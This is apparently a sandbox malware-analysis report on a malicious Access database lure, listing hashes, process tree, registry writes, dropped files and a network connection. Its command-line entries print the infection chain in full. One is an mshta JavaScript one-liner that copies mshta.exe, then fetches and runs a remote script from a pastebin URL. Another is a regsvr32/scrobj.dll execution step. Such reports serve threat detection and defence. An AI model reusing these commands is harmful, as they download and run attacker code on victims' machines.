File name: | Leaked_Records_15072019_Col.accdb |
Full analysis: | https://app.any.run/tasks/ccbb2180-78e2-469a-9d9e-856ee3f73e56 |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 13:39:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-msaccess |
File info: | Microsoft Access Database |
MD5: | BEFC603B7E59E0B739AE150FFC0CAD3A |
SHA1: | 4BF499C320E6806E877E68876A3BEB2ADA2A45AC |
SHA256: | 7C02D2F27147C49030C0619D1D313CFA24234F789E149B2E3D1478400496A32C |
SSDEEP: | 1536:DAQxNqc6lh3WHzVdGduAixBQdpdzdmdudJ:DAQxNqc6lsfkuAixAjJEcJ |
.accdb | | | Microsoft Access 2007 Database (90.4) |
---|---|---|
.pi2 | | | DEGAS med-res bitmap (9.5) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3544 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Leaked_Records_15072019_Col.accdb | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3276 | "C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE" /NOSTARTUP "C:\Users\admin\AppData\Local\Temp\Leaked_Records_15072019_Col.accdb" | C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE | rundll32.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Access Version: 14.0.6024.1000 | ||||
1080 | "C:\Windows\System32\mshta.exe" javascript:eval(new%20ActiveXObject("Scripting.FileSystemObject").CopyFile%20("c:\\windows\\system32\\mshta.exe",%20new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil.exe"));eval(new%20ActiveXObject("Wscript.Shell").Run(new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil%20javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();"));close(); | C:\Windows\System32\mshta.exe | MSACCESS.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3052 | "C:\Users\admin\AppData\Local\Microsoft\cutil.exe" javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close(); | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
1876 | "C:\Windows\System32\regsvr32.exe" /u /n /s /i:C:\Users\admin\AppData\Local\logs.tmp scrobj.dll | C:\Windows\System32\regsvr32.exe | — | cutil.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 5 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.accdb\OpenWithProgids |
Operation: | write | Name: | Access.Application.14 |
Value: | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | LangID |
Value: 0904 | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE |
Value: Microsoft Access | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
Value: Adobe Acrobat Reader DC | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\Windows\eHome\ehshell.exe |
Value: Windows Media Center | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\Program Files\Internet Explorer\iexplore.exe |
Value: Internet Explorer | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\Windows\system32\mspaint.exe |
Value: Paint | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\Windows\system32\NOTEPAD.EXE |
Value: Notepad | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\PROGRA~1\MICROS~1\Office14\OIS.EXE |
Value: Microsoft Office 2010 | |||
(PID) Process: | (3544) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
Operation: | write | Name: | C:\Program Files\Opera\Opera.exe |
Value: Opera Internet Browser |
PID | Process | Filename | Type | |
---|---|---|---|---|
3276 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\CVRF3D6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3052 | cutil.exe | C:\Users\admin\AppData\Local\temp.tmp | executable | |
MD5:91456160503D1965136BBE939606878E | SHA256:350CDEC0802FB24B9AA93CF44C318DCC12BBAF2D85B0E43D0142C54690A18138 | |||
3276 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw | mdw | |
MD5:5DD1E148840C367A82F4A1BE6926825F | SHA256:D4787D4F6ACCCDA7CF06F147598D637EE996543A2FB62E9023D3915512DC064F | |||
3052 | cutil.exe | C:\Users\admin\AppData\Local\logs.tmp | text | |
MD5:626C22DE97EEC542521DC24103DAA418 | SHA256:85287E7301D3983BBE6A95B4FA6F6451DB816E33F9366E27E561711B505F14C7 | |||
1080 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | executable | |
MD5:E2FE656A79D8F4C4FD70201E7423BDA0 | SHA256:DB40B518DEB81B146CC81B0C360AECC84204E3CDC108B1F5F158EE60C1792806 | |||
3052 | cutil.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\viwSRB6M[1].txt | xml | |
MD5:3739532BDF9B523E245EEEDD062AB5FF | SHA256:544C113236191E588D7679CB9168C5D45A8D4736B5D08217BE1C66DED4F468F3 | |||
3052 | cutil.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:7C2325BAB482DD93B5B9BC66B17CFA13 | SHA256:BA58614D2FD06B0D8E0955CA3820839D06F5FF41331892FE0D62BEDC8022BFEA | |||
3276 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\Database.lnk | lnk | |
MD5:31AEFA424BD036B40F8B9B64C1C9F78F | SHA256:67106A3278F63805F941D515BE4A40EA1DB3F0D926A4C9A8C71376F10E5EED26 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3052 | cutil.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
Process | Message |
---|---|
MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw |